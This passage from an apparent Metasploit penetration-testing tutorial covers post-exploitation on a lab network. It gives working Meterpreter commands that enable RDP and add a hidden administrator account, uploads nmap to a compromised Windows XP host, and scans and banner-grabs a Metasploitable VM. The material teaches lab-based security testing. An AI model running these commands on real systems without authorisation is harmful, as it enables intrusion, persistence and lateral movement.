Post Exploitation

At this point, we should have a Meterpreter console running in the background within msfconsole, so we can begin to scan the target’s subnet for other live systems. To do this, we’ll upload nmap to the target and run it from the Windows machine.

First, download nmap from insecure.org in an executable format and save it locally. We’ll be uploading this to our target. Next, we’ll connect to the target via Microsoft’s Remote Desktop Protocol (RDP), a built-in graphical remote administration protocol that lets you interact with the Windows Desktop as if you were sitting in front of the remote machine. After we’re connected with our Meterpreter session, we’ll use the getgui Meterpreter script to tunnel RDP back out to us over port 8080 and add a new administrative user to the system.

We enter rdesktop localhost:8080 from Back|Track’s command line, so we can log into the system with the newly created user account. We then use Meterpreter to upload nmap to the target. Our goal is to install nmap on the compromised Windows target and use the system as a staging ground for further attacks. Conversely you could use scanner/portscan/syn and scanner/portscan/tcp to port scan directly through Metasploit. The choice is a matter of personal preference and needs.

meterpreter > run getgui -e -f 8080
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 8080
[*] Local TCP relay created: 0.0.0.0:8080 <-> 127.0.0.1:3389
meterpreter > shell
Process 2480 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user msf metasploit /add
net user msf metasploit /ADD
The command completed successfully.
C:\WINDOWS\system32>net localgroup administrators msf /add
net localgroup administrators msf /add
The command completed successfully.
C:\WINDOWS\system32>
C:\WINDOWS\system32>^Z
Background channel 6? [y/N]  y
meterpreter > upload nmap.exe
[*] uploading  : nmap.exe -> nmap.exe
[*] uploaded   : nmap.exe -> nmap.exe
meterpreter >

We now have our launching pad for additional attacks. With nmap installed on the target, we are essentially sitting on the internal network. We can now attempt to enumerate internally connected systems and further penetrate the network.

Scanning the Metasploitable System

With our Meterpreter session granting us access to the internal network via the load auto_add_route command, we can scan and exploit the inside hosts using the compromised Windows XP target as the launching point. We’re effectively connected to the internal network, so we should be able to reach our Metasploitable system. Let’s begin with a basic port scan.

nmap.exe -sT -A -P0 172.16.32.162

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
|_ftp-bounce: no banner
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/
5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_html-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_html-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
MAC Address: 00:0C:29:39:12:B2 (VMware)
No exact OS matches for host (If you know what OS is running on it,
 see http://nmap.org/submit/ ).
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user:
 <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Name: WORKGROUP\Unknown
|_  System time: 2010-05-21 22:28:01 UTC-4

OS and Service detection performed. Please report any incorrect
 results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.19 seconds

Here we see a series of open ports. Based on nmap’s OS detection we see that the scanned system is a UNIX/Linux variant of some sort. Some of these ports should jump out at you, such as FTP, Telnet, HTTP, SSH, Samba, MySQL, PostgreSQL, and Apache.

Identifying Vulnerable Services

Because a few ports look interesting, we’ll start banner-grabbing each one to try to find a way into the system.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
msf auxiliary(ftp_version) > run

[*] 172.16.32.162:21 FTP Banner: '220
 ProFTPD 1.3.1 Server (Debian) [::ffff:172.16.32.162]\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >

Exiting the system, we know now that ProFTPD 1.3.1 is running on port 21. Next we use SSH to learn more about the target. (The addition of the -v flag gives us verbose output.) The next listing tells us that our target is running an older version of OpenSSH, specifically written for Ubuntu:

msf > ssh 172.16.32.162 -v
[*] exec: ssh 172.16.32.162 -v

OpenSSH_5.1p1 Debian-3ubuntu1, OpenSSL 0.9.8g 19 Oct 2007

Now we issue the following to determine the version of Ubuntu running on this system:

msf auxiliary(telnet_version) > set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
msf auxiliary(telnet_version) > run

[*] 172.16.32.162:23 TELNET Ubuntu 8.04\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >

Great! We know that the system is running Ubuntu 8.04 and that two unencrypted protocols (telnet and FTP) are in use that might come into play later.

Now let’s look at SMTP to see what version our target is running. Remember that we are trying to identify the running versions of the services operating on the various remote systems.

msf > use auxiliary/scanner/smtp/smtp_version
msf auxiliary(smtp_version) > set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
msf auxiliary(smtp_version) > run

[*] 172.16.32.162:25 SMTP 220 metasploitable.localdomain ESMTP
 Postfix (Ubuntu)\x0d\x0a
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smtp_version) >

As you can see, the Postfix mail server appears to be running on the Metasploitable server.

This process is continued through all the different ports that have been discovered as listening on our target. The various auxiliary modules are very useful for this work. When you’re finished, you should have a list of the versions of software running on the system, information that you will use when targeting attacks.